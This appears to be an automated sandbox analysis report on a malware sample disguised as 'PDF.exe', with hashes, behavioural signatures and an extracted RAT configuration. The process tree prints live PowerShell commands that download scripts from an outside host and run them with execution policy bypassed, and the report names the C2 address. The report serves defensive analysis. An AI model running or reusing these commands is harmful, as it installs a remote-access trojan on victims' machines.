Overview
overview
10Static
static
10Downloads/...07.exe
windows10-2004-x64
10Downloads/...5e.exe
windows10-2004-x64
10Downloads/...92.exe
windows10-2004-x64
10Downloads/...25.exe
windows10-2004-x64
10Downloads/...2e.exe
windows10-2004-x64
10Downloads/...8e.exe
windows10-2004-x64
10Downloads/...d4.exe
windows10-2004-x64
10Downloads/...98.exe
windows10-2004-x64
10Downloads/...b7.exe
windows10-2004-x64
10Downloads/Built.exe
windows10-2004-x64
8Downloads/...53.bat
windows10-2004-x64
10Downloads/DTLite.exe
windows10-2004-x64
10Downloads/...07.exe
windows10-2004-x64
10Downloads/PDF.exe
windows10-2004-x64
10Downloads/...SX.exe
windows10-2004-x64
10Downloads/...8a.exe
windows10-2004-x64
10Downloads/arwbjuh.exe
windows10-2004-x64
10Downloads/bjutbht.exe
windows10-2004-x64
10Downloads/black.bat
windows10-2004-x64
8Downloads/...mm.dll
windows10-2004-x64
10Downloads/...er.exe
windows10-2004-x64
1Downloads/...6d.exe
windows10-2004-x64
10Downloads/dwvhgtd.exe
windows10-2004-x64
10Downloads/file.exe
windows10-2004-x64
10Downloads/helper.bat
windows10-2004-x64
10Downloads/setup.exe
windows10-2004-x64
10Analysis
-
max time kernel
145s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
14-07-2024 08:50
Behavioral task
behavioral1
Sample
Downloads/1PDF.FaturaDetay_202407.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral2
Sample
Downloads/3e6642f7100bb72137d68b5aa34a2d1f1a75722ab7d2b15987bbdeb84bc3265e.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
Downloads/4c40337094cf0bb86fad86d2ea724ac6e6a499f0acd877839a69d35c354a7792.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
Downloads/644d928a4a942f6ae4c90640103b595941f7a0b557ba49d122d137b1429c0325.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
Downloads/64ec6562b96016699c6ae14166f4d31bde2b160eaa84d34a661fc2943017202e.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral6
Sample
Downloads/7a0395c75ac633d66a7a9f2690cbdb9c90ac5b0fc4f9273b6e0cf16f70eedd8e.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
Downloads/901478668c0d5ecb3b5044dcb3e1744045f7b2a800a7c0c67020d9294470f3d4.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral8
Sample
Downloads/938b7e042bda75e416261e46d0d4873781fd5d53c2ce6c2748b92eeb8a826598.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral9
Sample
Downloads/96d1bc7dec91a7a4e5fe653853a504e07d17e898fa437cf75e929fa909dd6bb7.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral10
Sample
Downloads/Built.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral11
Sample
Downloads/DHL_PT563857935689275783656385FV-GDS3535353.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral12
Sample
Downloads/DTLite.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral13
Sample
Downloads/PDF.FaturaDetay_202407.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral14
Sample
Downloads/PDF.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral15
Sample
Downloads/SIP.03746.XSLSX.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral16
Sample
Downloads/a33245a27c02bbb72bf66f6bf1c960affefa8ed2a096dc1d6faa6699fe81c48a.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral17
Sample
Downloads/arwbjuh.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral18
Sample
Downloads/bjutbht.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral19
Sample
Downloads/black.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral20
Sample
Downloads/borlndmm.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral21
Sample
Downloads/ccleaner.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral22
Sample
Downloads/d87e2dcd2eb9763552645a34218696143fa99ac7b5173dcd04889ce9f5ddf96d.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral23
Sample
Downloads/dwvhgtd.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral24
Sample
Downloads/file.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral25
Sample
Downloads/helper.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral26
Sample
Downloads/setup.exe
Resource
win10v2004-20240709-en
General
-
Target
Downloads/PDF.exe
-
Size
258KB
-
MD5
34c2047d0b69ba023b700c21431accc0
-
SHA1
e34c28611707c81565cb73d8a1a46dfc3ab2495a
-
SHA256
ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
-
SHA512
a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
-
SSDEEP
6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
http://thelustfactory.com/vns/1.ps1
Extracted
http://thelustfactory.com/vns/2.ps1
Extracted
http://thelustfactory.com/vns/winrar.exe
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
54.153.17.157:14445
rpujporiumcisxsdyop
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral14/files/0x000b000000023496-61.dat family_asyncrat -
Blocklisted process makes network request 6 IoCs
flow pid Process 12 3408 powershell.exe 13 3408 powershell.exe 17 2948 powershell.exe 18 2948 powershell.exe 19 3936 powershell.exe 20 3936 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation PDF.exe Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2456 winrar.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral14/files/0x0007000000023492-72.dat pdf_with_link_action -
pid Process 2948 powershell.exe 2952 powershell.exe 3936 powershell.exe 3408 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4012 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 52 IoCs
pid Process 3408 powershell.exe 3408 powershell.exe 2948 powershell.exe 2948 powershell.exe 2952 powershell.exe 2952 powershell.exe 3936 powershell.exe 3936 powershell.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe 2456 winrar.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3408 powershell.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 3936 powershell.exe Token: SeDebugPrivilege 2456 winrar.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4352 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2456 winrar.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe 4352 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1656 wrote to memory of 1032 1656 PDF.exe 84 PID 1656 wrote to memory of 1032 1656 PDF.exe 84 PID 1032 wrote to memory of 3408 1032 cmd.exe 86 PID 1032 wrote to memory of 3408 1032 cmd.exe 86 PID 1032 wrote to memory of 2948 1032 cmd.exe 87 PID 1032 wrote to memory of 2948 1032 cmd.exe 87 PID 1032 wrote to memory of 2952 1032 cmd.exe 88 PID 1032 wrote to memory of 2952 1032 cmd.exe 88 PID 1032 wrote to memory of 3936 1032 cmd.exe 89 PID 1032 wrote to memory of 3936 1032 cmd.exe 89 PID 3936 wrote to memory of 2456 3936 powershell.exe 90 PID 3936 wrote to memory of 2456 3936 powershell.exe 90 PID 1032 wrote to memory of 4012 1032 cmd.exe 91 PID 1032 wrote to memory of 4012 1032 cmd.exe 91 PID 1032 wrote to memory of 4352 1032 cmd.exe 92 PID 1032 wrote to memory of 4352 1032 cmd.exe 92 PID 1032 wrote to memory of 4352 1032 cmd.exe 92 PID 4352 wrote to memory of 2632 4352 AcroRd32.exe 94 PID 4352 wrote to memory of 2632 4352 AcroRd32.exe 94 PID 4352 wrote to memory of 2632 4352 AcroRd32.exe 94 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2376 2632 RdrCEF.exe 95 PID 2632 wrote to memory of 2940 2632 RdrCEF.exe 96 PID 2632 wrote to memory of 2940 2632 RdrCEF.exe 96 PID 2632 wrote to memory of 2940 2632 RdrCEF.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\Downloads\PDF.exe"C:\Users\Admin\AppData\Local\Temp\Downloads\PDF.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\79F3.tmp\79F4.tmp\79F5.bat C:\Users\Admin\AppData\Local\Temp\Downloads\PDF.exe"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps13⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Users\Admin\AppData\Roaming\winrar.exe"C:\Users\Admin\AppData\Roaming\winrar.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2456
-
-
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:4012
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=16D0E4B3B1B3477AA3E499B62AC20DC1 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2376
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E1EC3A12F95FA7CCDE9C0AD02C58D48C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E1EC3A12F95FA7CCDE9C0AD02C58D48C --renderer-client-id=2 --mojo-platform-channel-handle=1784 --allow-no-sandbox-job /prefetch:15⤵PID:2940
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F08C49D6DD90417A3230824A0AECD8A6 --mojo-platform-channel-handle=2336 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1228
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FD9B316CA160BE1AA07CA427327D0C33 --mojo-platform-channel-handle=2444 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1112
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D5B0D7C3F4D2F4EA777A5FD0EEB36B6D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D5B0D7C3F4D2F4EA777A5FD0EEB36B6D --renderer-client-id=6 --mojo-platform-channel-handle=2456 --allow-no-sandbox-job /prefetch:15⤵PID:3288
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=498C81549E73691DF1F30137000B9F19 --mojo-platform-channel-handle=2348 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1664
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2836
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD51a94bf8c290420a32bab5ea81dabb33a
SHA130d71ca5a2102f09bcbc249038fd611d1fb5188d
SHA2565bf64e9872d9ce650e499e7ee0b1b4bd5fbcc78d9b7ca5e81e5841a76774ddec
SHA512a4e7b33967cb44f866918ab5a662dc5d4334424a1bec7cdb210bdc97f78772c6e26b0e057d1a39fd8d5ee72a7bbb2e63f5321c50ce3d8e9374c74f344bbf72fa
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
1KB
MD5d8356d1901292ab1c540c91fc5a566e1
SHA143f7ebcae8fd258f2e704dceea5d279e228469de
SHA25690af996df16e4574d32f3bd46cdedef8d4c8b2595accbb224b411320068bb7b9
SHA512e54b149b66a89a736aa9f626358077072941eb210e220e6fe4550be1d124b0c28d2c5c1726ce3ef45e38a280567df3235555773a84a2d1e1e463582c2c1a366e
-
Filesize
944B
MD5669f9e64914930975fb9af5d88409e5e
SHA1577d0527624b594181c10b699b662de577d13f08
SHA256cf758217e566f7e4a3f026eebb77c9373d99a0db6630559747b3a47d41be05a6
SHA512768302fcffbd8c121d1fb418bb6ebe5b90747fb2acab1b583042c306b81f731f764cc5d2b502a45e5c8f1baa6a80fda0f492639afb6d1cc6364b9cea058f3c91
-
Filesize
712B
MD50e9ce5162ba7661c863a835f9d34d907
SHA10b351312ab57a02857753cab2287da680955f40d
SHA256b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA5128d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
